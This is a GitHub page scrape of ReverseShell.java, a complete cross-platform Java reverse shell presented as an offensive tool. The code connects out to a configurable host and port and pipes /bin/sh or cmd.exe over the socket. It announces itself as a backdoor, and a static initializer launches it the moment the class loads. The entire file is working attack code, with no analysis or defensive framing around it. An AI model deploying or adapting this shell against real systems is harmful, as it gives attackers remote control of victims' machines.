-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathReverseShell.java
130 lines (115 loc) · 5.51 KB
/
ReverseShell.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
// Copyright (c) 2021 Ivan Šincek
// v2.9
// Requires Java SE v8 or greater and JDK v8 or greater.
// Works on Linux OS, macOS, and Windows OS.
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketTimeoutException;
import java.util.Arrays;
public class ReverseShell {
// change the host address and/or port number as necessary
private static InetSocketAddress addr = new InetSocketAddress("127.0.0.1", 9000);
private static String os = null;
private static String shell = null;
private static byte[] buffer = null;
private static int clen = 0;
private static boolean error = false;
private static boolean detect() {
boolean detected = true;
os = System.getProperty("os.name").toUpperCase();
if (os.contains("LINUX") || os.contains("MAC")) {
os = "LINUX";
shell = "/bin/sh";
} else if (os.contains("WIN")) {
os = "WINDOWS";
shell = "cmd.exe";
} else {
detected = false;
System.out.print("SYS_ERROR: Underlying operating system is not supported, program will now exit...\n");
}
return detected;
}
// strings in Java are immutable, so we need to avoid using them to minimize the data in memory
private static void brw(InputStream input, OutputStream output, String iname, String oname) {
int bytes = 0;
try {
do {
if (os.equals("WINDOWS") && iname.equals("STDOUT") && clen > 0) {
// for some reason Windows OS pipes STDIN into STDOUT
// we do not like that
// we need to discard the data from the stream
do {
bytes = input.read(buffer, 0, clen >= buffer.length ? buffer.length : clen);
clen -= clen >= buffer.length ? buffer.length : clen;
} while (bytes > 0 && clen > 0);
} else {
bytes = input.read(buffer, 0, buffer.length);
if (bytes > 0) {
output.write(buffer, 0, bytes);
output.flush();
if (os.equals("WINDOWS") && oname.equals("STDIN")) {
clen += bytes;
}
} else if (iname.equals("SOCKET")) {
error = true;
System.out.print("SOC_ERROR: Shell connection has been terminated\n\n");
}
}
} while (input.available() > 0);
} catch (SocketTimeoutException ex) {} catch (IOException ex) {
error = true;
System.out.print(String.format("STRM_ERROR: Cannot read from %s or write to %s, program will now exit...\n\n", iname, oname));
}
}
public static void run() {
if (detect()) {
Socket client = null;
OutputStream socin = null;
InputStream socout = null;
Process process = null;
OutputStream stdin = null;
InputStream stdout = null;
InputStream stderr = null;
try {
client = new Socket();
client.setSoTimeout(100);
client.connect(addr);
socin = client.getOutputStream();
socout = client.getInputStream();
buffer = new byte[1024];
process = new ProcessBuilder(shell).redirectInput(ProcessBuilder.Redirect.PIPE).redirectOutput(ProcessBuilder.Redirect.PIPE).redirectError(ProcessBuilder.Redirect.PIPE).start();
stdin = process.getOutputStream();
stdout = process.getInputStream();
stderr = process.getErrorStream();
System.out.print("Backdoor is up and running...\n\n");
do {
if (!process.isAlive()) {
System.out.print("PROC_ERROR: Shell process has been terminated\n\n"); break;
}
brw(socout, stdin, "SOCKET", "STDIN");
if (stderr.available() > 0) { brw(stderr, socin, "STDERR", "SOCKET"); }
if (stdout.available() > 0) { brw(stdout, socin, "STDOUT", "SOCKET"); }
} while (!error);
System.out.print("Backdoor will now exit...\n");
} catch (IOException ex) {
System.out.print(String.format("ERROR: %s\n", ex.getMessage()));
} finally {
if (stdin != null) { try { stdin.close() ; } catch (IOException ex) {} }
if (stdout != null) { try { stdout.close(); } catch (IOException ex) {} }
if (stderr != null) { try { stderr.close(); } catch (IOException ex) {} }
if (process != null) { process.destroy(); }
if (socin != null) { try { socin.close() ; } catch (IOException ex) {} }
if (socout != null) { try { socout.close(); } catch (IOException ex) {} }
if (client != null) { try { client.close(); } catch (IOException ex) {} }
if (buffer != null) { Arrays.fill(buffer, (byte)0); }
}
}
}
static {
run();
System.gc();
}
}